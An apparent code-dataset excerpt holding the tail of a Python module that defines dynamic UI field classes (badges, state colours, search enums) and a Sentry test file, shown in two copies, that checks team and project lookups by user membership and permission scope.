_list_options.update({'sub_key': _default_badge.get('sub_key')})
if 'delimiter' in _default_badge:
_list_options.update({'delimiter': _default_badge.get('delimiter')})
_data_source.update({'options': ListDyFieldOptions(_list_options)})
if 'options' in kwargs:
_data_source.update({'options': ListDyFieldOptions(kwargs.get('options'))})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class EnumDyField(BaseDynamicField):
type = StringType(default="enum")
options = DictType(PolyModelType([StateItemDyField, BadgeItemDyField, ImageItemDyField, DatetimeItemDyField]),
serialize_when_none=False,
default={})
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
_default_badge = kwargs.get('default_badge', {})
_default_state = kwargs.get('default_state', {})
_default_outline_badge = kwargs.get('default_outline_badge', [])
_options_dic = {}
for _key in _default_outline_badge:
_round_index = len(TYPE_BADGE)
_index = _default_outline_badge.index(_key)
_num = math.floor(_index/len(TYPE_BADGE))
if _num > 0:
_round_index = len(TYPE_BADGE)*_num
if _round_index - 1 < _index:
_index = _index - _round_index
_options_dic[_key] = BadgeItemDyField.set({'outline_color': TYPE_BADGE[_index]})
for _key in _default_badge:
for _badge in _default_badge[_key]:
_options_dic[_badge] = BadgeItemDyField.set({'background_color': _key})
for _key in _default_state:
for _state in _default_state[_key]:
_state_options = {'icon': {'color': 'gray.400'}}
if _key == 'safe':
_state_options = {'icon': {'color': 'green.500'}}
elif _key == 'disable':
_state_options.update({'text_color': 'gray.400'})
elif _key == 'warning':
_state_options = {'icon': {'color': 'yellow.500'}}
elif _key == 'available':
_state_options = {'icon': {'color': 'blue.400'}}
elif _key == 'alert':
_state_options = {'text_color': 'red.500', 'icon': {'color': 'red.500'}}
_options_dic[_state] = StateItemDyField.set(_state_options)
_data_source.update({'options': _options_dic})
if 'options' in kwargs:
_data_source.update({'options': kwargs.get('options')})
if 'reference' in kwargs:
_data_source.update({'reference': kwargs.get('reference')})
return cls(_data_source)
class ProgressField(BaseDynamicField):
type = StringType(default="progress")
options = PolyModelType(ProgressFieldOptions, serialize_when_none=False, )
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': kwargs.get('options')})
return cls(_data_source)
class SizeField(BaseDynamicField):
type = StringType(default="size")
options = PolyModelType(SizeFieldOptions, serialize_when_none=False)
@classmethod
def data_source(cls, name, key, **kwargs):
_data_source = {'key': key, 'name': name}
if 'options' in kwargs:
_data_source.update({'options': kwargs.get('options')})
return cls(_data_source)
class SearchEnumField(Model):
label = StringType(serialize_when_none=False)
icon = ModelType(Icon, serialize_when_none=False)
@classmethod
def set_field(cls, label=None, icon=None):
return_dic = {}
if label is not None:
return_dic.update({'label': label})
if icon is not None:
return_dic.update({'icon': Icon(icon)})
return cls(return_dic)
class SearchField(BaseDynamicSearch):
enums = DictType(ModelType(SearchEnumField), serialize_when_none=False)
reference = StringType(serialize_when_none=False)
@classmethod
def set(cls, name='', key='', data_type=None, enums=None, reference=None):
return_dic = {
'name': name,
'key': key
}
if data_type is not None:
return_dic.update({'data_type': data_type})
if reference is not None:
return_dic.update({'reference': reference})
if enums is not None:
convert_enums = {}
for enum_key in enums:
enum_v = enums[enum_key]
convert_enums[enum_key] = SearchEnumField.set_field(**enum_v)
return_dic.update({
'enums': convert_enums
})
return cls(return_dic)
| true | true |
f732973ab5e14dcb0ef39a1adb7dc2e525a39b6e | 3,963 | py | Python | tests/sentry/manager/tests.py | pierredup/sentry | 0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80 | [
"BSD-3-Clause"
] | 1 | 2019-10-17T17:46:16.000Z | 2019-10-17T17:46:16.000Z | tests/sentry/manager/tests.py | pierredup/sentry | 0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80 | [
"BSD-3-Clause"
] | null | null | null | tests/sentry/manager/tests.py | pierredup/sentry | 0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
from sentry.models import Group, Project, Team, User
from sentry.testutils import TestCase
class SentryManagerTest(TestCase):
def test_valid_only_message(self):
event = Group.objects.from_kwargs(1, message="foo")
self.assertEquals(event.group.last_seen, event.datetime)
self.assertEquals(event.message, "foo")
self.assertEquals(event.project_id, 1)
class TeamManagerTest(TestCase):
def test_simple(self):
user = User.objects.create(username="foo")
org = self.create_organization()
team = self.create_team(organization=org, name="Test")
self.create_member(organization=org, user=user, teams=[team])
result = Team.objects.get_for_user(organization=org, user=user)
assert result == [team]
def test_invalid_scope(self):
user = User.objects.create(username="foo")
org = self.create_organization()
team = self.create_team(organization=org, name="Test")
self.create_member(organization=org, user=user, teams=[team])
result = Team.objects.get_for_user(organization=org, user=user, scope="idontexist")
assert result == []
def test_valid_scope(self):
user = User.objects.create(username="foo")
org = self.create_organization()
team = self.create_team(organization=org, name="Test")
self.create_member(organization=org, user=user, teams=[team])
result = Team.objects.get_for_user(organization=org, user=user, scope="project:read")
assert result == [team]
def test_user_no_access(self):
user = User.objects.create(username="foo")
user2 = User.objects.create(username="bar")
org = self.create_organization()
team = self.create_team(organization=org, name="Test")
self.create_member(organization=org, user=user, teams=[team])
result = Team.objects.get_for_user(organization=org, user=user2)
assert result == []
def test_with_projects(self):
user = User.objects.create(username="foo")
org = self.create_organization()
team = self.create_team(organization=org, name="Test")
self.create_member(organization=org, user=user, teams=[team])
project = self.create_project(teams=[team], name="foo")
project2 = self.create_project(teams=[team], name="bar")
result = Team.objects.get_for_user(organization=org, user=user, with_projects=True)
assert result == [(team, [project2, project])]
class ProjectManagerTest(TestCase):
def test_simple(self):
user = User.objects.create(username="foo")
org = self.create_organization()
team = self.create_team(organization=org, name="Test")
project = self.create_project(teams=[team], name="foo")
project2 = self.create_project(teams=[team], name="baz")
result = Project.objects.get_for_user(team=team, user=user, _skip_team_check=True)
assert result == [project2, project]
result = Project.objects.get_for_user(team=team, user=user, _skip_team_check=False)
assert result == []
self.create_member(organization=org, user=user, teams=[team])
# check again after creating member
result = Project.objects.get_for_user(team=team, user=user, _skip_team_check=True)
assert result == [project2, project]
result = Project.objects.get_for_user(team=team, user=user, _skip_team_check=False)
assert result == [project2, project]
# test with scope user doesn't have
result = Project.objects.get_for_user(
team=team, user=user, _skip_team_check=False, scope="project:write"
)
assert result == []
# check with scope they do have
result = Project.objects.get_for_user(
team=team, user=user, _skip_team_check=False, scope="project:read"
)
assert result == [project2, project]
| 41.28125 | 93 | 0.671209 | from __future__ import absolute_import
from sentry.models import Group, Project, Team, User
from sentry.testutils import TestCase
class SentryManagerTest(TestCase):
def test_valid_only_message(self):
event = Group.objects.from_kwargs(1, message="foo")
self.assertEquals(event.group.last_seen, event.datetime)
self.assertEquals(event.message, "foo")
self.assertEquals(event.project_id, 1)
class TeamManagerTest(TestCase):
def test_simple(self):
user = User.objects.create(username="foo")
org = self.create_organization()
team = self.create_team(organization=org, name="Test")
self.create_member(organization=org, user=user, teams=[team])
result = Team.objects.get_for_user(organization=org, user=user)
assert result == [team]
def test_invalid_scope(self):
user = User.objects.create(username="foo")
org = self.create_organization()
team = self.create_team(organization=org, name="Test")
self.create_member(organization=org, user=user, teams=[team])
result = Team.objects.get_for_user(organization=org, user=user, scope="idontexist")
assert result == []
def test_valid_scope(self):
user = User.objects.create(username="foo")
org = self.create_organization()
team = self.create_team(organization=org, name="Test")
self.create_member(organization=org, user=user, teams=[team])
result = Team.objects.get_for_user(organization=org, user=user, scope="project:read")
assert result == [team]
def test_user_no_access(self):
user = User.objects.create(username="foo")
user2 = User.objects.create(username="bar")
org = self.create_organization()
team = self.create_team(organization=org, name="Test")
self.create_member(organization=org, user=user, teams=[team])
result = Team.objects.get_for_user(organization=org, user=user2)
assert result == []
def test_with_projects(self):
user = User.objects.create(username="foo")
org = self.create_organization()
team = self.create_team(organization=org, name="Test")
self.create_member(organization=org, user=user, teams=[team])
project = self.create_project(teams=[team], name="foo")
project2 = self.create_project(teams=[team], name="bar")
result = Team.objects.get_for_user(organization=org, user=user, with_projects=True)
assert result == [(team, [project2, project])]
class ProjectManagerTest(TestCase):
def test_simple(self):
user = User.objects.create(username="foo")
org = self.create_organization()
team = self.create_team(organization=org, name="Test")
project = self.create_project(teams=[team], name="foo")
project2 = self.create_project(teams=[team], name="baz")
result = Project.objects.get_for_user(team=team, user=user, _skip_team_check=True)
assert result == [project2, project]
result = Project.objects.get_for_user(team=team, user=user, _skip_team_check=False)
assert result == []
self.create_member(organization=org, user=user, teams=[team])
result = Project.objects.get_for_user(team=team, user=user, _skip_team_check=True)
assert result == [project2, project]
result = Project.objects.get_for_user(team=team, user=user, _skip_team_check=False)
assert result == [project2, project]
result = Project.objects.get_for_user(
team=team, user=user, _skip_team_check=False, scope="project:write"
)
assert result == []
# check with scope they do have
result = Project.objects.get_for_user(
team=team, user=user, _skip_team_check=False, scope="project:read"
)
assert result == [project2, project]
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.